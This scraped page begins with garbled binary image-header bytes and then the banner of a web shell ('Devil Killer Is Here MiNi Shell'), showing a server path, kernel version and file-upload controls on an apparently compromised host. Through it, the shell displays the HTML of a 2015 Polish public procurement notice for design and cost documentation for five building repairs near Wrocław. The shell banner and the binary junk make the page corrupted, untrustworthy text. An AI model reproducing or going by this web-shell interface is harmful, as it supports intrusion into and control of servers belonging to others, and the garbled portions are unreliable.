JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150731/114795-N-2015.html

<p class="kh_header"><b>Wrocław: Wykonanie dokumentacji projektowo-kosztorysowej</b><br>
<b>Numer ogłoszenia: 114795 - 2015; data zamieszczenia: 31.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Nieruchomości Rolnych Oddział Terenowy we Wrocławiu , ul. Mińska 60, 54-610 Wrocław, woj. dolnośląskie, tel. 71 356 39 19, faks 71 357 90 97.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.anr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot 1: przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej remontu budynku wielorodzinnego w Szczawnie Zdroju przy ul. Baczyńskiego 1 (Dz. Nr 604/2 obręb Szczawno Zdrój), w zakresie remontu: dach budynku, elewacja, osuszenie i remont piwnic, malowanie klatki schodowej. Zamówienie obejmuje uzyskanie stosownych pozwoleń, pełnienie funkcji nadzoru autorskiego oraz uzyskanie niezbędnych opinii, decyzji i uzgodnień. 

    Wykonana dokumentacja projektowa zgodnie z art. 31 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, służyć będzie do opisu przedmiotu zamówienia w przetargu na roboty budowlane mające na celu zrealizowanie zaprojektowanych rozwiązań. 
    Dostęp do wnętrza budynku w celu wykonania inwentaryzacji i oględzin, ma być wykonany przez Wykonawcę własnym staraniem i na własny koszt. 
     Zamówienia obejmuje wykonanie dokumentacji projektowej zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.), zawierającej:
     a) Projekt budowlany wraz z jego uzupełnieniem i uszczegółowieniem w zakresie 
i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez Wykonawcę i realizacji robót budowlanych oraz z częścią opisową - 5 egz. (4 egz. do pozwolenia na budowę).
     b) Specyfikacja techniczna wykonania i odbioru robót budowanych - 3 egz. 
     c) Kosztorys inwestorski - 3 egz. - wykonany w programie NORMA lub innym kompatybilnym, którego format plików może być czytany i przetwarzany przez program NORMA. 
Wykonanie kosztorysu inwestorskiego winno być opracowane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. - w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-
-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389 z późn. zm.).
     d) Przedmiar robót - 3 egz. - wraz z oświadczeniem, że przedmiar uwzględnia m.in. koszty niezbędnych opinii, badań, ekspertyz, dokumentacji powykonawczych (np. instalacji elektrycznych, odbiorów geodezyjnych, Urzędu Dozoru Technicznego, opinii sanepidu itp.). 
     e) Wykonanie lub uzyskanie innych niezbędnych dokumentów i uzgodnień wymaganych prawem wraz z pełnieniem nadzoru autorskiego. 
           Dokumenty będące przedmiotem niniejszego postępowania Wykonawca zobowiązany jest dołączyć w wersji elektronicznej na nośniku danych.
           Wykonana dokumentacja winna obejmować wszystkie niezbędne elementy z punktu widzenia celu, któremu ma służyć.

Przedmiot 2 przedmiotem zamówienia jest wykonanie STWiOR, przedmiaru i kosztorysu dla realizacji rozbiórki budynku gospodarczego w Kopaczowie przy ul. Głównej 5 (Dz. Nr 261/5 obręb Kowaczów).
       
Wykonana dokumentacja projektowa zgodnie z art. 31 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, służyć będzie do opisu przedmiotu zamówienia w przetargu na roboty budowlane mające na celu zrealizowanie zaprojektowanych rozwiązań. 
       Zamówienia obejmuje wykonanie: 
       a) Specyfikacja techniczna wykonania i odbioru robót budowanych - 3 egz. 
       d) Kosztorys inwestorski - 3 egz. - wykonany w programie NORMA lub innym kompatybilnym, którego format plików może być czytany i przetwarzany przez program NORMA. 
Wykonanie kosztorysu inwestorskiego winno być opracowane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. - w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-
-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389 z późn. zm.).
      e) Przedmiar robót - 3 egz. - wraz z oświadczeniem, że przedmiar uwzględnia m.in. koszty niezbędnych opinii, badań, ekspertyz, dokumentacji powykonawczych (np. instalacji elektrycznych, odbiorów geodezyjnych, Urzędu Dozoru Technicznego, opinii sanepidu itp.). 

Przedmiot 3: przedmiotem zamówienia jest wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynkach byłych obór położonych na terenie dz. nr 233/5 w Doboszowicach gm. Kamieniec Ząbkowicki w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z pełnieniem funkcji nadzoru autorskiego  

Zakres opracowania obejmuje projekt  budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski,, uzyskanie pozwolenia Wojewódzkiego Konserwatora Zabytków, niezbędnych opinii, uzgodnień, map oraz pełnienie nadzoru autorskiego.

Budynek byłej obory ( nr inw. 16470/006/182):
- wykonanie remontu drewnianej konstrukcji więźby dachowej
- wykonanie uzupełnienia lub wymiany pokrycia dachowego
- uzupełnienie obróbek blacharskich, rynien i rur spustowych
- trwałe zabezpieczenie otworów okiennych i drzwiowych 

Powierzchnia zabudowy- 402 m2
Powierzchnia dachu- 540 m2

Budynek byłej obory ( nr inw. 16469/005/182):
- wykonanie remontu drewnianej konstrukcji więźby dachowej
- wykonanie uzupełnienia lub wymiany pokrycia dachowego
- uzupełnienie obróbek blacharskich, rynien i rur spustowych
-zabezpieczenie ceglanych sklepień 
- trwałe zabezpieczenie otworów okiennych i drzwiowych 

Powierzchnia zabudowy- 472 m2
Powierzchnia dachu- 620 m2

Budynek jest nieużytkowany. Dostęp do wnętrza budynków w celu wykonania oględzin, ma być wykonany przez zleceniobiorcę własnym staraniem i na własny koszt.

     Wykonana dokumentacja projektowa zgodnie z art. 31 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, służyć będzie do opisu przedmiotu zamówienia w przetargu na roboty budowlane mające na celu zrealizowanie zaprojektowanych rozwiązań. 
    Dostęp do wnętrza pałacu w celu wykonania inwentaryzacji i oględzin, ma być wykonany przez Wykonawcę własnym staraniem i na własny koszt. 
     Zamówienia obejmuje wykonanie dokumentacji projektowej zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.), zawierającej:
     a) Projekt budowlano-wykonawczy wraz z jego uzupełnieniem i uszczegółowieniem w zakresie 
i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez Wykonawcę i realizacji robót budowlanych oraz z częścią opisową - 5 egz. (4 egz. do pozwolenia na budowę).
     b) Specyfikacja techniczna wykonania i odbioru robót budowanych - 3 egz. 
     c) Kosztorys inwestorski - 3 egz. - wykonany w programie NORMA lub innym kompatybilnym, którego format plików może być czytany i przetwarzany przez program NORMA. 
Wykonanie kosztorysu inwestorskiego winno być opracowane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. - w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-
-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389 z późn. zm.).
     d) Przedmiar robót - 3 egz. - wraz z oświadczeniem, że przedmiar uwzględnia m.in. koszty niezbędnych opinii, badań, ekspertyz, dokumentacji powykonawczych (np. instalacji elektrycznych, odbiorów geodezyjnych, Urzędu Dozoru Technicznego, opinii sanepidu itp.). 
     e) Wykonanie lub uzyskanie innych niezbędnych dokumentów i uzgodnień wymaganych prawem wraz z pełnieniem nadzoru autorskiego. 
           Dokumenty będące przedmiotem niniejszego postępowania Wykonawca zobowiązany jest dołączyć w wersji elektronicznej na nośniku danych.
           Wykonana dokumentacja winna obejmować wszystkie niezbędne elementy z punktu widzenia celu, któremu ma służyć.

Przedmiot 4: przedmiotem zamówienia jest wykonanie dokumentacji technicznej tj. projektu i kosztorysów na roboty budowlane związane z usunięciem występujących nieprawidłowości w budynku mieszkalnym położonym na dz. nr 710/3 w Starczowie 111 gm. Kamieniec Ząbkowicki w uzgodnieniu z właściwym konserwatorem zabytków oraz administracją architektoniczno- budowlaną wraz z pełnieniem funkcji nadzoru autorskiego  

Zakres opracowania obejmuje projekt budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski, uzyskanie pozwolenia Wojewódzkiego Konserwatora Zabytków, niezbędnych opinii, uzgodnień, map oraz pełnienie nadzoru autorskiego.

Budynek mieszkalny 
- wykonanie izolacji budynku wraz z osuszeniem ścian
- uzupełnienie tynków zewnętrznych wraz z mapowaniem elewacji 
- wykonanie remontu konstrukcji więźby dachowej wraz z jej impregnacją 
- uszczelnienie pokrycia dachowego wraz z oczyszczeniem i pomalowaniem 
- uzupełnienie obróbek blacharskich 
-uzupełnienie tynków wewnętrznych 
- wymiana drzwi wejściowych do obiektu oraz okien na poddaszu
- naprawa podłogi drewnianej na poddaszu
- wykonanie prawidłowej (właściwej) wentylacji pomieszczeń 
- uzupełnienie tynków na ciągach kominowych
- naprawa instalacji odgromowej wraz z wymianą uziomów 

Powierzchnia zabudowy- 253,8 m2
Wysokość- 13,2 m
Kubatura - 1621,1 m3

Budynek jest użytkowany. Dostęp do wnętrza budynków w celu wykonania oględzin, ma być wykonany przez zleceniobiorcę własnym staraniem i na własny koszt.
  
    Wykonana dokumentacja projektowa zgodnie z art. 31 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, służyć będzie do opisu przedmiotu zamówienia w przetargu na roboty budowlane mające na celu zrealizowanie zaprojektowanych rozwiązań. 
    Dostęp do wnętrza pałacu w celu wykonania inwentaryzacji i oględzin, ma być wykonany przez Wykonawcę własnym staraniem i na własny koszt. 
     Zamówienia obejmuje wykonanie dokumentacji projektowej zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.), zawierającej:
     a) Projekt budowlany wraz z jego uzupełnieniem i uszczegółowieniem w zakresie 
i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez Wykonawcę i realizacji robót budowlanych oraz z częścią opisową - 5 egz. (4 egz. do pozwolenia na budowę).
     b) Specyfikacja techniczna wykonania i odbioru robót budowanych - 3 egz. 
     c) Kosztorys inwestorski - 3 egz. - wykonany w programie NORMA lub innym kompatybilnym, którego format plików może być czytany i przetwarzany przez program NORMA. 
Wykonanie kosztorysu inwestorskiego winno być opracowane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. - w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-
-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389 z późn. zm.).
     d) Przedmiar robót - 3 egz. - wraz z oświadczeniem, że przedmiar uwzględnia m.in. koszty niezbędnych opinii, badań, ekspertyz, dokumentacji powykonawczych (np. instalacji elektrycznych, odbiorów geodezyjnych, Urzędu Dozoru Technicznego, opinii sanepidu itp.). 
     e) Wykonanie lub uzyskanie innych niezbędnych dokumentów i uzgodnień wymaganych prawem wraz z pełnieniem nadzoru autorskiego. 
           Dokumenty będące przedmiotem niniejszego postępowania Wykonawca zobowiązany jest dołączyć w wersji elektronicznej na nośniku danych.
           Wykonana dokumentacja winna obejmować wszystkie niezbędne elementy z punktu widzenia celu, któremu ma służyć.
   
Przedmiot 5: przedmiotem zamówienia jest wykonanie dokumentacji projektowo- kosztorysowej na remont i przebudowę 3 lokali mieszkalnych z wydzieleniem łazienki i wc oraz pomieszczeń gospodarczych wraz z niezbędną infrastrukturą i przyłączami w Świdnicy przy ul. Kliczkowskiej 28 d-e w uzgodnieniu z właściwą administracją architektoniczno- budowlaną wraz z pełnieniem funkcji nadzoru autorskiego  

Zakres opracowania obejmuje projekt  budowlano-wykonawczy, przedmiar robót, specyfikację techniczną wykonania i odbioru robót, kosztorys inwestorski, uzyskanie niezbędnych opinii, uzgodnień, map, prawomocnej decyzji pozwolenia na budowę oraz pełnienie nadzoru autorskiego


Budynek mieszkalny II piętro:
Lokal mieszkalny nr 1- powierzchnia ok 39 m2
Lokal mieszkalny nr 2- powierzchnia ok 34 m2
Lokal mieszkalny nr 3- powierzchnia ok 39 m2
Korytarz- powierzchnia ok 36 m2
Ubikacje z przeznaczeniem na 3 pomieszczenia gospodarcze- powierzchnia ok 15 m2

Budynek jest nieużytkowany. Dostęp do wnętrza budynków w celu wykonania oględzin, ma być wykonany przez zleceniobiorcę własnym staraniem i na własny koszt.  
    Wykonana dokumentacja projektowa zgodnie z art. 31 ust. 1 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, służyć będzie do opisu przedmiotu zamówienia w przetargu na roboty budowlane mające na celu zrealizowanie zaprojektowanych rozwiązań. 
    Dostęp do wnętrza pałacu w celu wykonania inwentaryzacji i oględzin, ma być wykonany przez Wykonawcę własnym staraniem i na własny koszt. 
     Zamówienia obejmuje wykonanie dokumentacji projektowej zgodnie z rozporządzeniem Ministra Infrastruktury z 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2004 r. Nr 202, poz. 2072 z późn. zm.), zawierającej:
     a) Projekt budowlany wraz z jego uzupełnieniem i uszczegółowieniem w zakresie 
i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego, przygotowania oferty przez Wykonawcę i realizacji robót budowlanych oraz z częścią opisową - 5 egz. (4 egz. do pozwolenia na budowę).
     b) Specyfikacja techniczna wykonania i odbioru robót budowanych - 3 egz. 
     c) Kosztorys inwestorski - 3 egz. - wykonany w programie NORMA lub innym kompatybilnym, którego format plików może być czytany i przetwarzany przez program NORMA. 
Wykonanie kosztorysu inwestorskiego winno być opracowane zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. - w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-
-użytkowym (Dz. U. z 2004 r. Nr 130, poz. 1389 z późn. zm.).
     d) Przedmiar robót - 3 egz. - wraz z oświadczeniem, że przedmiar uwzględnia m.in. koszty niezbędnych opinii, badań, ekspertyz, dokumentacji powykonawczych (np. instalacji elektrycznych, odbiorów geodezyjnych, Urzędu Dozoru Technicznego, opinii sanepidu itp.). 
     e) Wykonanie lub uzyskanie innych niezbędnych dokumentów i uzgodnień wymaganych prawem wraz z pełnieniem nadzoru autorskiego. 
           Dokumenty będące przedmiotem niniejszego postępowania Wykonawca zobowiązany jest dołączyć w wersji elektronicznej na nośniku danych.
           Wykonana dokumentacja winna obejmować wszystkie niezbędne elementy z punktu widzenia celu, któremu ma służyć.

Informacje dodatkowe dotyczące wykonania przedmiotu zamówienia (Przedmioty 1-5). 
 1. Projektant obowiązany jest do złożenia oświadczenia, że dokumentacja wykonana jest zgodnie z obowiązującymi przepisami prawa, z wiedzą, ze sztuką budowlaną oraz jest kompletna 
z punktu widzenia celu, dla którego została sporządzona, przy uwzględnieniu pełnego zakresu prac niezbędnych do wykonania zamówienia oraz, że przedmiar robót został sporządzony na podstawie pomiarów z natury dokonywanych na obiekcie, którego dotyczy dokumentacja.
 2. Informacje zawarte w dokumentacji w zakresie technologii wykonania robót, doboru materiałów i urządzeń powinny określić przedmiot zamówienia w sposób zgodny z ustawą 
z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tj. Dz. U. z 2013r. poz. 907 
z późn. zm.) tzn. bez używania nazw własnych, a jedynie poprzez określenie parametrów precyzujących rodzaj, wielkość, standard oraz inne istotne elementy. 
 3. Na etapie opracowania dokumentacji wymagane są robocze konsultacje z Zamawiającym.
 4. Wykonawca zobowiązany jest do dokonania wizji lokalnej w terenie oraz do zdobycia wszelkich informacji, które mogą być konieczne do prawidłowej wyceny wartości robót, gdyż wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania przedmiotu zamówienia.
 5. W przypadku stwierdzenia przez Wykonawców podczas wizji lokalnej prac niezbędnych do prawidłowego wykonania przedmiotu zamówienia i mających wpływ na cenę oferty zobowiązuje się wykonawcę do pisemnego złożenia zapytania, złożonego w trybie art. 38 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. 
 6. Roszczenia zgłoszone po wyborze najkorzystniejszej oferty nie będą uwzględniane, ponieważ Zamawiający nie będzie ponosił żadnych dodatkowych kosztów za prawidłowe wykonanie przedmiotu zamówienia.
 7. Wszelkie koszty poniesione w związku z czynnościami niezbędnymi dla prawidłowego wykonania dokumentacji ponosi Wykonawca i powinny być uwzględnione w cenie oferty.
 8. Pozostałe warunki zostały określone we wzorze umowy, które stanowią integralną część specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada uprawnienia do wykonywania robót objętych zamówieniem Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca posiada niezbędną wiedzę i doświadczenie. Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia. Wykonawca zobowiązany jest załączyć do oferty: Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia, i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie dysponowania tymi osobami, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj. uprawnienia do projektowania w branży: - architektonicznej lub konstrukcyjno-budowlanej, lub innej w wymaganej prawem, - instalacyjno sanitarne lub innej w wymaganej prawem, - elektrycznej lub innej w wymaganej prawem wraz z oświadczeniem o posiadaniu ważnego zaświadczenie o przynależności do izby zawodowej - wg wzoru formularza ofertowego. Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca zobowiązany jest załączyć do oferty oświadczenie, że Wykonawca spełnia warunki określone w art.22 ust. 1 ustawy PZP wg wzoru formularza ofertowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
